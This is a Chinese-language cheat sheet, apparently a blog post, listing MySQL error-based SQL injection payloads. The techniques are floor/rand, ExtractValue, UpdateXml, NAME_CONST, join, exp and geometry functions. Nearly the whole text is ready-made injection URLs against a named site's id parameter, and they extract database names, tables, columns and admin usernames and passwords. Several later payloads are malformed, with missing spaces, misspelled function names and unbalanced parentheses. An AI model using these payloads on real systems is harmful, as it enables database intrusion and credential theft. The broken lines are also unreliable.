mysql暴錯注入方法整理，通過floor，UpdateXml，ExtractValue，NAME_CONST，Error based Double Query Injection等方法

SQL注入

1、通過floor暴錯
/資料庫版本/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/連線使用者/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/連線資料庫/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/暴庫/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/暴表/
http://www.waitalone.cn/sql.php?id=1+and(select

1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/暴欄位/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/暴內容/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

2、ExtractValue(有長度限制,最長32位)
http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e, (select @@version),0x7e))

http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))

3、UpdateXml(有長度限制,最長32位)
http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

6.知道庫名錶名和一條列名得到下一條列名

在知道庫名、表名後，可以利用報錯注入得到列名
pro_id=0 and (select * from (select * from youcanneverfindme17.product_2017ctf a join youcanneverfindme17.product_2017ctf b using (pro_id))c)
得到下一列pro_name，繼續報錯
pro_id=0 and (select * from (select * from youcanneverfindme17.product_2017ctf a join youcanneverfindme17.product_2017ctf b using (pro_id,pro_name))c)

補充一些嗯

1、通過NAME_CONST報錯,注入語句如下:
and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

2、通過join報錯,注入語句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;

3、通過exp報錯,注入語句如下:
and exp(~(select * from (select user () ) a) );

4、通過GeometryCollection()報錯,注入語句如下:
and GeometryCollection(()select *from(select user () )a)b );

5、通過polygon ()報錯,注入語句如下:
and polygon (()select * from(select user ())a)b );

6、通過multipoint ()報錯,注入語句如下:
and multipoint (()select * from(select user() )a)b );

7、通過multlinestring ()報錯,注入語句如下:
and multlinestring (()select * from(selectuser () )a)b );

8、通過multpolygon ()報錯,注入語句如下:
and multpolygon (()select * from(selectuser () )a)b );

9、通過linestring ()報錯,注入語句如下:
and linestring (()select * from(select user() )a)b );